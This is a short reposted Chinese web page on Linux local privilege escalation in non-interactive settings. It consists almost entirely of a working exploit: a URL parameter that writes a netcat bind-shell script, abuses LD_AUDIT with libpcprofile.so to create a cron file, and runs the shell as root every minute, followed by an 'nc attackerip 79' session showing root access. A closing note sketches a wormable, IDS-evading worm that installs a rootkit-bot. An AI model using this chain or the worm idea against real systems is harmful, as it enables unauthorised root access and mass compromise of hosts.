Linux非交互环境下本地提权思路与反思 linux loca(2)

?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit

$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)

---------
| IDEAS |
---------

Looks like a wormable bug. The urlobfuscated (IDS/IPS) worm search for SQLI/BSQLI bugs or remote code execution bugs.
Then the worm injects the evil url and do the same for other ips. It installs a rootkit-bot and the game is over.© Offensive Security 2010

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwszsp.html